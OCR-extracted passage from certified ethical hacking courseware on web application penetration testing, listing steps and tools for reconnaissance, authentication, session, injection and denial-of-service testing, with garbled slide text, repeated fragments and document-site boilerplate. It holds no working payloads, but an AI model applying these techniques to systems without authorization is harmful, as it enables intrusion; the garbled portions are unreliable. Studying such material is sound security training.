a tta c k s . T h e r e f o r e , t o a v o id t h is s i t u a t i o n , y o u s h o u ld c o n d u c t p e n e t r a t i o n t e s t i n g in o r d e r t o d e t e r m i n e t h e v u ln e r a b i l it ie s b e f o r e t h e y a re e x p l o i t e d b y real a tta c k e r s .
W e b A p p Pen T e s t in g
S e cu rity Tools
lM
^ 3
H acking M e th o d o lo g y
EC-C0UnCil
W eb applications can be compromised in many ways. This section describes how to conduct web application pen testing against all possible kinds of attacks.
Module 13 Page 1959
Web Application Pen Testing

J buffer overflow, SQ L injection, bypassing authentication, code execution, etc. in a given application J
CEH
W eb application pen testing is used to identify, analyze, and report vu ln erabilities such as input validation,
The best w ay to perform penetration testing is to conduct a series of m ethodical and repeatable te sts, and to work through all of the different application vulnerabilities
p --------1 h ttp ./
smm
!
Id e n tific a tio n o f P o rts Scan the ports to identify the associated running services and analyze them through automated or manual tests to find weaknesses
j
Rem ediation of V u lnerab ilities To retest the solution against vulnerability to ensure that it is completely secure
V e r ific a tio n o f V u ln e ra b ilitie s To exploit the vulnerability in order to test and fix the issue
|p ] W eb A p p lic a tio n P e n T e s tin g
1ur
W eb application pen testing is done to detect various security vulnerabilities and
associated risks. As a pen tester, you should test your web application for vulnerabilities such as input validation, buffer overflow, SQL injection, bypassing authentication, code execution, etc. The best way to carry out a penetration test is to conduct a series of methodical and repeatable tests, and to work through all of the different application vulnerabilities.
Web application pen testing helps in: Identification of Ports: Scan the ports to identify the associated running services and
analyze them through automated or manual tests to find weaknesses.
Verification of Vulnerabilities: To exploit the vulnerability in order to test and fix the
issue.
Remediation of Vulnerabilities: To retest the solution against vulnerability to ensure

that it is completely secure.
Module 13 Page 1960
_ _
Web Application Pen Testing

(C o n td)
ST A RT
CEH
Inform ation G athering v Configuration M anag em ent Testing 9 A uth en ticatio n Testing V Session M anag em ent Testing
A uthorization Testing -----------* ------------
W e b Services Testing
Business Logic Testing ----------- * ----------------------- -----------Data Validation Testing -----------* ------------
A JA X Testing
Denial-of-Service Testing
W e b A p p l i c a t i o n P e n T e s t i n g ( C o n t d)
The general steps that you need to follow to conduct web application penetration test are listed as follows. In a future section, each step is explained in detail.
Step 1: Defining objective

You should define the aim of the penetration test before conducting it. This would help you to move in right direction towards your aim of penetration test.
Step 2: Information gathering

You should gather as much information as possible about your target system or network.
Step 3: Configuration management testing

Most web application attacks occur because of improper configuration. Therefore, you should conduct configuration management testing. This also helps you to protect against known vulnerabilities by installing the latest updates.
Step 4: Authentication testing session

Test the authentication session to understand the authentication mechanism and to determine the possible exploits in it.
Module 13 Page 1961
Step 5: Session management testing

Perform session management testing to check your web application against various attacks that are based on session ID such as session hijacking, session fixation, etc.
Step 6: Denial-of-service testing

Send a vast amount of requests to the web application until the server gets saturated. Analyze the behavior of application when the server is saturated. In this way you can test your web application against denial-of-service attacks.
Step 7: Data validation testing

Failing to adopt a proper data validation method is the common security weakness observed in most web applications. This may further lead to major vulnerabilities in web applications. Hence, before a hacker finds those vulnerabilities and exploits your application, perform data validation testing and protect your web application.
Step 8: Business logic testing

W eb application security flaws may be present even in business logic. Hence, you should test the business logic for flaws. Exploiting this business logic, attackers may do something that is not allowed by businesses and it may sometimes lead to great financial loss. Testing business logic for security flaws requires unconventional thinking.
Step 9: Authorization testing

Analyze how a web application is authorizing the user and then try to find and exploit the vulnerabilities present in the authorization mechanism.
Step 10: Web services testing

W eb services use HTTP protocol in conjuction with SML, WSDL, SOAP, and UDDI technologies. Therefore, web services have XML/parser related vulnerabilities in addition to SQL injection, information disclosure, etc. You should conduct web services testing to determine the vulnerabilities of web-based services.
Step 11: AJAX testing

Though more responsive web applications are developed using AJAX, it is likely as vulnerable as a traditional web application. Testing for AJAX is challenging because web application developers are given full freedom to design the way of communication between client and server.
Step 12: Document all the findings

Once you conduct all the tests mentioned here, document all the findings and the testing techniques employed at each step. Analyze the document and explain the current security posture to the concerned parties and suggest how they can enhance their security.
Module 13 Page 1962
Inform ation G athering
ST A RT
A llo w e d an d d is a llo w e d d ire cto ries
CEH
Retrieve and analyze robots.txt file using tools such as GNU Wget Use the advanced "site:" search operator and then click "Cached" to perform search engine reconnaissance Identify application entry points using tools such as Webscarab, Burp proxy, OWASP ZAP, TamperlE (for Internet Explorer), or Tamper Data (for Firefox) To identify web applications: probe for URLs, do dictionary-style searching (intelligent guessing) and perform vulnerability scanning using tools such as Nmap (Port Scanner) and Nessus Implement techniques such as DNS zone transfers, DNS inverse queries, web-based DNS searches, querying search engines (googling)
V
Perform search engine reconnaissance
Issu es o f w e b app lica tion stru ctu re, erro r pages p ro du ced
Identify application entry points
C o okie in fo rm a tio n , 300 > HTTP and 400 statu s codes, 500 in te rn a l s e rv e r errors
Identify the web applications
W e b ap p lica tio n s, old versio n s o f file s o r artifacts
Analyze the O/P from HEAD and OPTIONS http requests
W e b s e rv e r so ftw a re v e rsio n , scripting e n v iro n m e n t, and O S in use
Copyrigh t b y
EC-Cauactl. A ll Rights R eserve d. R eproduction is Strictly Prohibited.
In fo rm a tio n G a th e rin g
Let's get into detail and discuss each web application test step thoroughly. The first step in web application pen testing is information gathering. To gather all the information about the target application, follow these steps:
Step 1: Analyze the robots.txt file

Robot.txt is a file that instructs web robots about the website such as directories that can be allowed and disallowed to the user. Hence, analyze the robot.txt and determine the allowed and disallowed directories of a web application. You can retrieve and analyze robots.txt file using tools such as GNU Wget.
Step 2: Perform search engine reconnaissance

Use the advanced "site:" search operator and then click Cached to perform search engine reconnaissance. It gives you information such as issues of web application structure and error pages produced.
Module 13 Page 1963
Step 3: Identify application en try points

Identify application entry points using tools such as Webscarab, Burp Proxy, OWASP ZAP, TamperlE (for Internet Explorer), or Tamper Data (for Firefox). Cookie information, 300 HTTP and 400 status codes, and 500 internal server errors may give clues about entry points of the target web application.
Step 4: Identify t h e w e b applications

To identify web applications: probe for URLs, do dictionary-style searching (intelligent
guessing), and perform vulnerability scanning using tools such as Nmap (Port Scanner) and Nessus. Check for web applications, old versions of files, or artifacts. Sometimes the old versions of files may give useful information that attackers can use to launch attacks on the web application.
Step 5: Analyze t h e O/ P from HEAD a nd OPTIONS ht tp r eq ue s ts

Implement techniques such as DNS zone transfers, DNS inverse queries, web-based DNS searches, querying search engines (Googling). This may reveal information such as web server software version, scripting environment, and OS in use.
Module 13 Page 1964
Inform ation G athering

(C o n td)
8 y
r gu
(lllfwtf | ltkl4l NMhM
Analysis of error codes
.....
Software versions, details of databases, bugs, and technological components
Analyze error codes by requesting invalid pages and utilize alternate request methods (POST/PUT/Other) in order to collect confidential information from the server
> f Test for recognized file types/extensions/ directories

W e b application environment
Examine the source code from the accessible pages of the application frontend
Test for recognized file types/extensions/directories by requesting common file extensions such as .ASP, .HTM, .PHP, .EXE, and watch for any unusual output or error codes Perform TCP/ICMP and service fingerprinting using traditional fingerprinting tools such as Nmap and Queso, or the more recent application fingerprinting tool Amap
> f Examine source of available pages

Provide dues as to the
......
underlying application environment
> / TCP/ICMP and service fingerprinting

W e b application services and associated ports
In fo rm a tio n G a th e rin g (C ontd)

Step 6: Analyze error codes
Analyze error codes by requesting invalid pages and utilize alternate request methods (POST/PUT/Other) in order to collect confidential information from the server. This may reveal information components. such as software versions, details of databases, bugs, and technological
Step 7: Test for recognized file t y p e s / e x te n s io n s / d ir e c t o r ie s

Test for recognized file types/extensions/directories by requesting common file extensions such as .ASP, .HTM, .PHP, .EXE, and observe the response. This may give you an idea about the web application environment.
Step 8: Examine source of available pages

Examine the source code from the accessible pages of the application front-end. This provides clues about the underlying application environment.
Step 9: TCP/ICMP an d service fingerprinting

Perform TCP/ICMP and service fingerprinting using traditional fingerprinting tools such as Nmap and Queso, or the more recent application fingerprinting tools Amap. This gives you information about web application services and associated ports.
Module 13 Page 1965
Configuration M anagem ent Testing

START Disclosure of confidential information
jI K mIm te rtM M IUm
c EH
1
&
V
Perform infrastructure configuration management testing
w Identify th e ports associated to SSL/TLS w rapped services using N m ap and N essus e P erform netw ork scanning and analyze th e w eb server banner Test th e application configuration m a n a g em en t using CGI s c a n n e rs and reviewing th e co n te n ts of th e w eb server, application server, com m ents, configuration and logs Use vulnerability s c a n n e rs , sp id erin g an d m irroring to o ls , sea rch e n g in es queries or perform m anual inspection to te s t for file extensions handling
Source code of the application
t Review source code, e n u m e ra te application pages and functionality & P erform d irec to ry an d file e n u m e ra tio n , reviewing server an d application docum entation, etc . to te s t for infrastructure and application adm in interfaces Review OPTIONS HTTP m ethod using N etcat or Telnet
Information in the source code, log files, and default error codes
<
Perform application configuration management testing
Confidential information about access credentials
Test for file extensions handling
Test for HTTP methods and XST
... >
Credentials of legitimate users
Source code, installation paths, passwords for applications, and databases
Verify the presence of old, backup, and unreferenced files
Test for infrastructure and application admin interfaces
Admin interfaces can be found to gain access to admin functionality
C o n fig u ra tio n M a n a g e m e n t T e stin g

f ^ \
Once you gather information about the web application environment, test the
configuration management. It is important to test the configuration management because improper configuration may allow unauthorized users to break into the web application.
Stepl: Perform SSL/TLS testing

SSL/TLS testing allows you to identify the ports associated with SSL/TLS wrapped services. You can do this with the help of tools such as Nmap and Nessus. This helps disclose confidential information.
Step 2: Perform infrastructure configuration management testing

Perform network scanning and analyze web server banners to analyze the source code of the application.
Step 3: Perform application configuration management testing

Test the configuration management of infrastructure using CGI scanners and reviewing the contents of the web server, application server, comments, configuration, and logs. This gives you information about the source code, log files, and default error codes.
Module 13 Page 1966
Step 4: Test for file extensions handling

Use vulnerability scanners, spidering and mirroring tools, search engines queries, or perform manual inspection to test for file extensions handling. This may reveal confidential information about access credentials.
Step 5: Verify the presence of old, backup, and unreferenced files

Review source code and enumerate application pages and functionality to verify the old, backup, and unreferenced files. This may reveal the installation paths and passwords for applications and databases.
Step 6: Test for infrastructure and application admin interfaces

Perform directory and file enumeration, review server and application documentation, etc. to test for infrastructure and application admin interfaces. Admin interfaces can be used to gain access to the admin functionality.
Step 7: Test for HTTP methods and XST

Review OPTIONS HTTP method using Netcat or Telnet to test for HTTP methods and XST. This may reveal credentials of legitimate users.
Module 13 Page 1967

Authentication Testing
START
C EH
Try to reset passwords by guessing, social engineering, or cracking secret questions, if used. Check if "remember my password" mechanism is implemented by checking the HTML code of the login page. Check if it is possible to "reuse" a session after logout. Also check if the application automatically logs out a user when that user has been idle for a certain amount of time, and that no sensitive data remains stored in the browser cache. Authentication vulnerabilities Identify all parameters that are sent in addition to the decoded CAPTCHA value from the client to the server and try to send an old decoded CAPTCHA value with an old CAPTCHA ID of an old session ID
Test for logout and browser cache management
Authentication vulnerabilities
V
Test for CAPTCHA
Test for multiple factors authentication
Multiple factors authentication vulnerabilities
W Check if users hold a hardware device of some kind in addition to the password. Check if hardware device communicatesdirectlyand independently with the authentication infrastructure using an additional communication channel. Attempt to force a race condition, make multiple simultaneous requests while observing the outcome for unexpected behavior. Perform code review.
Test for race conditions
Race conditions
H jjjjg A u t h e n t i c a t i o n T e s t i n g
You need to perform the following steps to carry out authentication testing:
Step 1: Test for Vulnerable Remember password and pwd reset

Test for Vulnerable Remember password and pwd reset by attempting to reset passwords by guessing, social engineering, or cracking secret questions, if used. Check if a "remember my password" mechanism is implemented by checking the HTML code of the login page; through this password, authentication weakness can be uncovered.
Step 2: Test for logout and browser cache management

Check if it is possible to "reuse" a session after logout. Also check if the application automatically logs out a user when that user has been idle for a certain amount of time, and that no sensitive data remains stored in the browser cache.
Step 3: Test for CAPTCHA

Identify all parameters that are sent in addition to the decoded CAPTCHA value from the client to the server and try to send an old decoded CAPTCHA value with an old CAPTCHA ID of an old session ID. This helps you to determine authentication vulnerabilities.
Module 13 Page 1968

Step 4: Test for multiple factors authentication

Check if users hold a hardware device of some kind in addition to the password. Check if the hardware device communicates directly and independently with the authentication infrastructure using an additional communication channel.
Step 5: Test for race conditions

Attempt to force a race condition and make multiple simultaneous requests while observing the outcome for unexpected behavior. Perform code review to check if there is a chance for race conditions.
Module 13 Page 1969
Session Management Testing

START
C o okie tam p e rin g resu lts in hijacking th e session s o f le g itim a te users
CEH
Collect sufficient number of cookie samples, analyze the cookie generation algorithm and forge a valid cookie in order to perform the attack Test for cookie attributes using intercepting proxies such as Webscarab, Burp proxy, OWASP ZAP, or traffic intercepting browser plug-in's such as "TamperlE"(for IE) and "Tamper Data"(for Fi refox) To test for session fixation, make a request to the site to be tested and analyze vulnerabilities using the WebScarab tool Test for exposed session variables by inspecting encryption & reuse of session token, proxies & caching , GET & POST, and transport vulnerabilities Examine the URLs in the restricted area to test for CSRF
Test for cookie attributes
Co okie in fo rm a tio n to hijack a v a lid session
Test for session on fixation
A tta ck er could steal th e ^ u s e r s ession (session hijacking)
Test for exposed session variables
C o n fid e n tia l in fo rm a tio n of s ession to k e n lea d s to a re p la y session a ttack
V
Test for CSRF (Cross Site Request Forgery)
^ C o m prom ises e n d u s er data an d o p e ra tio n o r e n tire w e b ap p lica tio n
pySj
S essio n M a n a g e m e n t T e stin g
After testing the configuration management, test how the application manages the
session. The following are the steps to conduct session management pen testing:
Step 1: Test for session management schema

Collect a sufficient number of cookie samples, analyze the cookie generation algorithm, and forge a valid cookie in order to perform the attack. This allows you to test your application against cookie tampering, which results in hijacking the sessions of legitimate users.
Step 2: Test for cookie attributes

Test for cookie attributes using intercepting proxies such as Webscarab, Burp Proxy, OWASP ZAP, or traffic intercepting browser plugins such as "TamperlE"(for IE) and "Tamper Data"(for Firefox). If you are able to retrieve cookie information, then you can use this information to hijack a valid session.
Step 3: Test for session fixation

To test for session fixation, make a request to the site to be tested and analyze vulnerabilities using the WebScarab tool. This helps you to determine whether your application is vulnerable to session hijacking.
Module 13 Page 1970
Step 4: Test for exposed session variables

Confidential information of session token leads to a replay session attack. Therefore, test for exposed session variables by inspecting encryption and reuse of session token, proxies and caching, GET and POST, and transport vulnerabilities.
Step 5: Test for CSRF (Cross Site Request Forgery)

Examine the URLs in the restricted area to test for CSRF. A CSRF attack compromises end-user data and operation or the entire web application.
Module 13 Page 1971
A uthorization Testing
START y Can gain access to reserved information
M Jl N mIm te ftM M Itk
C EH
Test for path traversal by performing input vector enumeration and analyzing the input validation functions present in the web application e Test for bypassing authorization schema by examining the admin functionalities, to gain access to the resources assigned to a different role
Test for role/privilege manipulation Copyright by E C G a u a c t l .All Rights Reserved. Reproduction is Strictly Prohibited.
A u th o riz a tio n T e s tin g

Follow vulnerabilities: the steps here to test the web application against authorization
Step 1: Test for path traversal

Test for path traversal by performing input vector enumeration and analyzing the input validation functions present in the web application. Path traversal allows attackers to gain access to reserved information.
Step 2: Test for bypassing authorization schema

Test for bypassing authorization schema by examining the admin functionalities, to gain access to the resources assigned to a different role. If the attacker succeeds in bypassing the authorization schema, he or she can gain illegal access to reserved functions/resources.
Step 3: Test for privilege escalation

Test for role/privilege manipulation. If the attacker has access to resources/functionality, then he or she can perform a privilege escalation attack.
Module 13 Page 1972
D ata Validation Testing

START Session cookie information
C EH
(rtifwtf ttfciui Nm Im
Detect and analyze input vectors for potential vulnerabilities, analyze the vulnerability report and attem pt to exploit it. Use tools such as OWASP CAL9000, WebScarab, XSS-Proxy, ratproxy, and Burp Proxy Analyze HTML code, test for Stored XSS, leverageStoredX SS,verifyifthefile upload allows setting arbitrary MIME types using tools such as OWASP CAL9000, Hackvertor, BeEF, XSS-Proxy, Backframe, WebScarab, B urp,and XSS Assistant
Sensitive information such as session authorization tokens
Perform source code analysis to identify JavaScript coding errors Analyze SWF files using tools such as SWFIntruder, Decompiler Flare, Compiler MTASC, Disassembler-Flasm,Swfmil I, and Debugger Version of Flash Plugi n/Player Perform Standard SQL Injection Testing, Union Query SQL Injection Testing, Blind SQL Injection Testing, and S tored Procedure Injection using tools suchas OWASP SQUX, sqlninja, SqlDumper, sqlbftools, SQL Power Injector, etc. Use a trial and erro r approach by i n s e r t i n g ' I a nd the other characters in order to check the appl icati on for errors. Use the tool Softerra LDAP Browser
Test for stored cross-site scripting
Cookie information
Test for DOM-based cross-site scripting
Information on DOMbased cross-site scripting vulnerabilities <......
Test for cross site flashing
Sensitive information about users and hosts
Database information
<......
Perform SQL injection testing
___^
Perform LDAP injection testing
D a ta V a lid a tio n T e stin g

W eb applications must employ proper data validation methods. Otherwise, there may be a chance for the attacker to break into the communication between the client and the server, and inject malicious data. Hence, the data validation pen testing must be conducted to ensure that the current data validation methods or techniques employed by the web application offer appropriate security. Follow the steps here to perform data validation testing:
Step 1: Test for reflected cross-site scripting

A reflected cross-site scripting attacker crafts a URL to exploit the reflected XSS vulnerability and sends it to the client in a spam mail. If the victim clicks on the link considering it as from a trusted server, the malicious script embedded by the attacker in the URL gets executed on the victim's browser and sends the victim's session cookie to the attacker. Using this session cookie, the attacker can steal the sensitive information of the victim. Hence, to avoid this kind of attack you must check your web applications against reflected XSS attacks. If you put proper data validation mechanisms or methods in place, then you can determine easily whether the URL came originally from the server or it is crafted by the attacker. Detect and analyze input vectors for potential vulnerabilities, analyze the vulnerability report, and attempt to exploit it. Use tools such as OWASP CAL9000, Hackvertor, BeEF, XSS-Proxy, Backframe, WebScarab, XSS Assistant, and Burp Proxy.
Module 13 Page 1973
Step 2: Test for stored cross-site scripting

Analyze HTML code, test for Stored XSS, leverage Stored XSS and verify if the file upload allows setting arbitrary M IM E types using tools such as OWASP CAL9000, Hackvertor, BeEF, XSS-Proxy, Backframe, WebScarab, Burp, and XSS Assistant. Stored XSS attacks allow attackers to uncover sensitive information such as session authorization tokens.
Step 3: Test for DOM-based cross-site scripting

DOM XSS attack stands for document object model based cross-site scripting attack, which affects the client's browser script code. In this attack, the input is taken from the user and then some malicious action is performed with it, which in turn leads to the execution of injected malicious code. W eb applications can be tested against DOM XSS attacks by performing source code analysis to identify JavaScript coding errors.
Step 4: Test for cross site flashing

Analyze SW F files using tools such as SWFIntruder, Decompiler - Flare, Compiler - MTASC, Disassembler - Flasm, Swfmill, and Debugger Version of the Flash Plugin/Player. Flawed flash applications may contain DOM-based XSS vulnerabilities. The test for cross-site flashing gives information on DOM-based cross-site scripting vulnerabilities.
Step 5: Perform SQL injection testing

Perform standard SQL injection testing, union query SQL injection testing, blind SQL injection testing, and stored procedure injection using tools such as OWASP SQLiX, sqlninja, SqlDumper, sqlbftools, SQL Power Injector, etc. SQL injection attacks give database information to the attacker.
Step 6: Perform LDAP injection testing

Use a trial and error approach by inserting '(', 11 ', reveal sensitive information about users and hosts. and the other characters in order to
check the application for errors. Use the tool Softerra LDAP Browser. The LDAP injection may
Module 13 Page 1974
Data Validation Testing

(C o n td)
CEH
Discover vulnerabilities of an ORM tool and test web applications that use ORM. Use tools such as Hibernate, Nhibernate, and Ruby On Rails Try to insert XML metacharacters Information about XML structure Find if the web server actually supports SSI directives using tools such as W eb Proxy Burp Suite, OWASP ZAP, WebScarab, String searcher: grep Inject XPath code and interfere with the query result Identify vulnerable parameters. Access confidential information Understand the data flow and deployment structure of the client, and perform IMAP/SMTP command injection
Information on SQL injection vulnerability
W eb server CGI environment variables
Perform IM A P/SM TP injection testing
Access to the backend mail server
D a t a V a l i d a t i o n T e s t i n g ( C o n t d)
Step 7: Perform ORM injection testing
Perform ORM injection testing to discover vulnerabilities of an ORM tool and test web applications that use ORM. Use tools such as Hibernate, Nhibernate, and Ruby On Rails. This test gives information on SQL injection vulnerabilities.
Step 8: Perform XML injection testing

To perform XML injection testing, try to insert XML meta characters and observe the response. A successful XML injection may give information about XM L structure.
Step 9: Perform SSI injection testing

Perform SSI injection testing and find if the web server actually supports SSI directives using tools such as W eb Proxy Burp Suite, Paros, WebScarab, String searcher: grep. If the attacker can inject SSI implementations, then he or she can set or print web server CGI environment variables.
Step 10: Perform XPath injection testing

Inject XPath code and interfere with the query result. XPath injection allows the attacker to access confidential information.
Module 13 Page 1975
Step 11: Perform IMAP/SMTP injection testing

Perform IMAP/SMTP injection testing to identify vulnerable parameters. Understand the data flow and deployment structure of the client, and perform IM AP/SM TP command injection. Malicious IMAP/SMTP commands allow attackers to access the backend mail server.
Module 13 Page 1976
Data Validation Testing

(C o n td)
< Input validation errors
CEH
Inject code (a malicious URL) and perform source code analysis to discover code injection vulnerabilities Perform manual code analysis and craft malicious HTTP requests using | to test for
Perform OS commanding
...y
Local data and system information
OS command injection attacks Perform manual and automated code analysis using tools such as OllyDbg to detect buffer overflow condition Upload a file that exploits a component in the local user workstation, when viewed or downloaded by the user, perform XSS, and SQL injection attack Identify all user controlled input that influences one or more headers in the response, and check whether he or she can successfully inject a CR+LF sequence in it
y
Perfo rm buffer o ve rflo w testin g ^ Stack and heap memory information, application control flow
y
Perform incubated vu ln erab ility testing ' Server configuration and input validation schemes
y
Test for HTTP splitting/smuggling ...- y Cookies, and HTTP redirect information
D a t a V a l i d a t i o n T e s t i n g ( C o n t d)
Step 12: Perform code injection testing
To perform code injection testing, inject code (a malicious URL) and perform source code analysis to discover code injection vulnerabilities. It gives information about input validation errors.
Step 13: Perform OS commanding

Perform manual code analysis and craft malicious HTTP requests using | to test for OS command injection attacks. OS commanding may reveal local data and system information.
Step 14: Perform buffer overflow testing

Perform manual and automated code analysis using tools such as OllyDbg to detect buffer overflow condition. This may help you to determine stack and heap memory information and application control flow.
Step 15: Perform incubated vulnerability testing

Upload a file that exploits a component in the local user workstation, when viewed or downloaded by the user, perform XSS, and SQL injection attacks. Incubated vulnerabilities may give information about server configuration and input validation schemes to the attackers.
Module 13 Page 1977
Step 16: Test for HTTP splitting/smuggling

Identify all user-controlled input that influences one or more headers in the response and check whether he or she can successfully inject a CR+LF sequence in it. Attackers perform HTTP splitting/smuggling to get cookies and HTTP redirect information.
Module 13 Page 1978
D enialofService Testing
d
C EH
Application information
Craft a query that will not return a result and includes several wildcards. Test manually or employ a fuzzer to automate the process
6 Test for locking custom er accounts Login account information
Test that an account does indeed lock after a certain number of failed logins. Find places where the application discloses the difference between valid and invalid logins
Test for buffer o verflow s
Buffer overflow points
Perform a manual source code analysis and submit a range of inputs with varying lengths to the application
Test for user specified object allocation
Maximum number of > objects that application can handle
Find where the numbers submitted as a name/value pair might be used by the application code and attempt to set the value to an extremely large numeric value, then see if the server continues to respond
D e n i a l o fS e r v i c e T e s t i n g
To check your web application against DoS attacks, follow these steps :
Stepl: Test for SQL wildcard attacks

Craft a query that will not return a result and includes several wildcards. Test manually or employ a fuzzer to automate the process.
Step2: Test for locking customer accounts

Test that an account does indeed lock after a certain number of failed logins. Find places where the application discloses the difference between valid and invalid logins. If your web application doesn't lock customer accounts after a certain number of failed logins, then there is a possibility for the attacker to crack customer passwords by employing brute force attacks, dictionary attacks, etc.
Step3: Test for buffer overflows

Perform a manual source code analysis and submit a range of inputs with varying lengths to the application to test for buffer overflows.
Step4: Test for user specified object allocation

Find where the numbers submitted as a name/value pair might be used by the application code and attempt to set the value to an extremely large numeric value, and then see if the server
Module 13 Page 1979
continues to respond. If the attacker knows the maximum number of objects that the application can handle, he or she can exploit the application by sending objects beyond maximum limit.
Module 13 Page 1980
D enialofService Testing
(C o n td)
6 Logical errors in an application
CEH
Enter an extremely large number in the input field that is used by application as a loop counter
Use a script to automatically submit an extremely long value to the server in the request that is being logged W rite user provided data to disk ,w. Local disks exhaustion Identify and send a large number of requests that perform database operations and observe any slowdown or new error messages Test for proper release of resources Programming flaws Create a script to automate the creation of many new sessions with the server and run the request that is suspected of caching the data within the session for each one V Test for storing too much data in session Session management errors
D e n i a l o fS e r v i c e T e s t i n g ( C o n t d)
Step5: Test for user input as a loop counter
Test for user input as a loop counter and enter an extremely large number in the input field that is used by application as a loop counter. If the application fails to exhibit its predefined manner, it means that application contains a logical error.
Step 6: Write user provided data to disk

Use a script to automatically submit an extremely long value to the server in the request that is being logged.
Step7: Test for proper release of resources

Identify and send a large number of requests that perform database operations and observe any slowdown or new error messages.
Step 8: Test for storing too much data in session

Create a script to automate the creation of many new sessions with the server and run the request that is suspected of caching the data within the session for each one.
Module 13 Page 1981
Web Services Testing
CEH
w To gather W S information use tools such as wsCh ess, Soaplite, CURL, Peri, etc. and online tools such as UDDI Brow ser, W SIn d ex , and Xm ethods Use tools such as W SD igger, W e b Sca ra b , and Found stone to autom ate web services security testing Pass malformed SOAP messages to XM L parser or attach a very large string to the message. Use W Sd igger to perform autom ated X M L structure testing e Use w eb application vulnerability scanners such as W eb Sca ra b to test XM L content-level vulnerabilities Pass malicious con ten t on th e HTTP GET strings th at invoke XM L applications Craft an X M L docum ent (SOAP message) to send to a w eb service that contains malware as an attachm ent to check if XM L document has SOAP attachm ent vulnerability Attem pt to resend a sniffed XM L message using W iresh ark and W eb Scarab
Information about SQL, XPath, buffer overflow, and command injection vulnerabilities
Information about MITM vulnerability
HTTP GET/REST attack vectors
SOAP message information
W eb S e rv ic e s T e s tin g
Stepl: Gather W S information
Gather W S information using tools such as Net Square wsChess, Soaplite, CURL, Perl, etc. and online tools such as UDDI Browser, WSIndex, and Xmethods.
Step 2: Test WSDL

Test WSDL to determine various entry points of WSDL. You can automate web services security testing using tools such as WSDigger, WebScarab, and Foundstone.
Step 3: Test XML structural

Pass malformed SOAP messages to the XML parser or attach a very large string to the message. Use WSdigger to perform automated XM L structure testing.
Step 4: Test XML content-level

Use web application vulnerability scanners such as WebScarab to test XML content-level vulnerabilities.
Step 5: Test HTTP GET parameters/REST

Pass malicious content on the HTTP GET strings that invoke XML applications.
Module 13 Page 1982
Step 6: Test naughty SOAP attachments

Craft an XML document (SOAP message) to send to a web service that contains malware as an attachment to check if XML document has SOAP attachment vulnerability.
Step 7: Perform replay testing

Attempt to resend a sniffed XML message using Wireshark and WebScarab. This test gives information about MITM vulnerability.
Module 13 Page 1983

Hacking W eb Applications
AJAX Testing
AJAX application call endpoints
CEH
y
Parse the HTM L and JavaScrip t files XMLHttpRequest object, JavaScript files, AJAX frameworks
Use a proxy to observe traffic
............. v
Format of application requests
Enum erate the AJAX call endpoints for the asynchronous calls using tools such as Sprajax Observe HTM L and JavaScript files to find URLs of additional application surface exposure
Use proxies and sniffers to observe traffic generated by user-viewable pages and the background asynchronous traffic to the A JAX endpoints in order to determ ine the form at and destination of the requests
AJAX T e s t i n g
The following are the steps used to carry out AJAX pen testing:
Step 1: Test for AJAX

Enumerate the AJAX call endpoints for the asynchronous calls using tools such as Sprajax.
Step 2: Parse the HTML and JavaScript files

Observe HTML and JavaScript files to find URLs of additional application surface exposure.
Step 3: Use a proxy to observe traffic

Use proxies and sniffers to observe traffic generated by user-viewable pages and the background asynchronous traffic to the AJAX endpoints in order to determine the format and destination of the requests.
Module 13 Page 1984
M odule Sum m ary

Organizations today rely heavily on web applications and Web 2.0 technologies to support key business processes and im prove perform ance
Urtiffetf
CEH
itkNjI lUilwt
With increasing dependence, web applications and web services are increasingly being targeted by various attacks that results in huge revenue loss for the organizations Some of the m ajor web application vulnerabilities include injection flaws, cross-site scripting (XSS), SQL injection, security m isconfiguration, broken session m anagem ent, etc. Input validation flaws are a m ajor concern as attackers can exploit these flaws to perform or create a base for m ost of the web application attacks, includingcross-site scripting, buffer overflow, injection attacks, etc. It is also observed that m ost of the vulnerabilities result because of m isconfiguration and not following standard security practices Com m on counterm easures for web application security include secure application developm ent, input validation, creating and following security best practices, using WAF Firewall/IDS and perform ing regular auditing of network usingweb application security tools ----
M o d u le S u m m a ry
Q Organizations today rely heavily on web applications and W eb 2.0 technologies to support key business processes and improve performance. With increasing dependence, web applications and web services are increasingly being targeted by various attacks that results in huge revenue loss for the organizations. Some of the major web application vulnerabilities include injection flaws, cross-site scripting (XSS), SQL injection, security misconfiguration, broken session management, etc. e Input validation flaws are a major concern as attackers can exploit these flaws to perform or create a base for most of the web application attacks, including cross-site scripting, buffer overflow, injection attacks, etc. e It is also observed that most of the vulnerabilities result because of misconfiguration and not following standard security practices. Common countermeasures for web application security include secure application development, input validation, creating and following security best practices, using WAF firewall/IDS, and performing regular auditing of network using web application security tools.
Module 13 Page 1985

CEHv8 Module 13 Hacking Web Applications PDF

Uploaded by

Document Information

Original Description:

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

CEHv8 Module 13 Hacking Web Applications PDF

Uploaded by

Copyright:

Available Formats

Hacking Web Applications

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

H acking Web A pplications

Engineered by Hackers. Presented by Professionals.

E th ic a l H ack in g and C ounterm easures v8

Module 13: Hacking Web Applications Exam 312-50

Module 13 Page 1724

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

S e c u rity N e w s XSS Attacks Lead Pack As Most Frequent Attack Type

Module 13 Page 1725

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

Module 13 Page 1726

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

Copyright 2013 U B M Tech, All rights reserved

Module 13 Page 1727

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.

Module 13 Page 1728

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

How Web Applications Work Web Attack Vectors

Module 3 Page 1729

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

Copyright by E&Coinal. All Rights Reserved. Reproduction is Strictly Prohibited.

Module 13 Page 1730

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

Web App Pen Testing

Web App Concepts

Web App Threats

Web Application Hacking Tools

Module 13 Page 1731

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

Web Application Security Statistics

Copyright by EtC tin o l. All Rights Reserved. Reproduction is Strictly Prohibited.

